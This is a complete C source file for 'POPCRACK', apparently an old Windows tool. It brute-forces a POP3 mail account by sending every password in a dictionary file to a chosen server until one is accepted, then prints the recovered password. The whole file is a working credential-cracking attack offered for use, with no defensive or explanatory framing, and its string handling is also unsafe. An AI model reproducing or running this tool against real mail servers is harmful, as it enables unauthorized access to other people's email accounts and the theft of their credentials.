#include <stdio.h>
#include <conio.h>
#include <windows.h>
#include <winuser.h>
#include <winsock.h>

#define MAX 4096

SOCKET call_socket(const char *hostname, unsigned short portnum)
{
  struct sockaddr_in sa;
  struct hostent *hp;
  SOCKET s;
  unsigned long addr;

  memset(&sa, 0, sizeof(sa));
  addr = inet_addr(hostname);
  if (addr != INADDR_NONE)
  {
    sa.sin_addr.s_addr = addr;
    sa.sin_family = AF_INET;
  }
  else
  {
    hp = gethostbyname(hostname);
    if (hp == NULL)
      return INVALID_SOCKET;
    memcpy((char *)&sa.sin_addr, hp->h_addr, hp->h_length);
    sa.sin_family = hp->h_addrtype;
  }
  sa.sin_port = htons((u_short)portnum);
  s = socket(sa.sin_family, SOCK_STREAM, 0);
  if (s == INVALID_SOCKET)
    return INVALID_SOCKET;
  
  if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) == SOCKET_ERROR)
  {
    closesocket(s);
    return INVALID_SOCKET;
  }
  return s;
}

short send_data(SOCKET s, char *buf, short len)
{
  short bytes,
        num;

  bytes = 0;
  num = 0;
  while (bytes < len)
  {
    num = send(s, buf, len - bytes, 0);
    if (num > 0)
    {
      bytes += num;
      buf += num;
    }
    else 
    {
      if (num == SOCKET_ERROR)
        return SOCKET_ERROR;
    }
  }
  
  return bytes;
}

void send_line(SOCKET s, char *str)
{
  send_data(s, str, strlen(str));
}

short read_line(SOCKET s, char *buf, short max)
{
  short n;

  do
  {
    n = recv(s, buf, max, MSG_PEEK);
    if (n == SOCKET_ERROR)
      return SOCKET_ERROR;
  } while (strchr(buf, 10) == NULL);
  n = strchr(buf, 10) - buf;
  n = recv(s, buf, n + 1, 0);
  if (n == SOCKET_ERROR)
    return SOCKET_ERROR;
  buf[--n] = 0;
  
  return n;
}

void main(int argc, char *argv[])
{
  WSADATA wsadata;
  SOCKET sock;
  SOCKADDR_IN local_sin;
  FILE *fp;
  char buf[MAX],
       cmd[MAX],
       pass[MAX];
  
  if ((argc != 4) && (argc != 5))
  {
    printf("\nPOPCRACK -- by David Phillips <david@acz.org>\n");
    printf("\nUsage: POPCRACK dictionary_file username mail_server [port]\n");
    return;
  }
  
  if (WSAStartup(MAKEWORD(1, 1), &wsadata) != 0)
  {
    printf("Error initializing Winsock!\n");
    return;
  }

  if (argc < 5)
    sock = call_socket(argv[3], 110);
  else
      sock = call_socket(argv[3], atoi(argv[4]));
  if (sock == INVALID_SOCKET)
  {
    printf("Failed to connect to host!\n");
    WSACleanup();
    return;
  }

  read_line(sock, buf, MAX);
  printf("%s\n", buf);
  strcpy(cmd, "USER ");
  strcat(cmd, argv[2]);
  strcat(cmd, "\n");
  send_line(sock, cmd);
  printf("%s", cmd);
  read_line(sock, buf, MAX);
  printf("%s\n", buf);
  if (strncmp(buf, "+OK", 3))
  {
    closesocket(sock);
    WSACleanup();
    return;
  }
  
  fp = fopen(argv[1], "r");
  if (fp == NULL)
  {
    printf("Cannot open dictionary file!\n");
    closesocket(sock);
    WSACleanup();
    return;
  }
  fgets(buf, MAX, fp);
  while (!feof(fp))
  {
    strcpy(cmd, "PASS ");
    strcat(cmd, buf);
    strcpy(pass, buf);
    pass[strlen(pass) - 1] = '\0';
    send_line(sock, cmd);
    printf("%s", cmd);
    if (read_line(sock, buf, MAX) == SOCKET_ERROR)
    {
      printf("Error reading data!\n");
      fclose(fp);
      closesocket(sock);
      WSACleanup();
      return;
    }
    printf("%s\n", buf);
    if (!strncmp(buf, "+OK", 3))
    {
      printf("Password for user '%s' is '%s'\n", argv[2], pass);
      break;
    }
    fgets(buf, MAX, fp);
  }
  fclose(fp);

  closesocket(sock);
  WSACleanup();
}
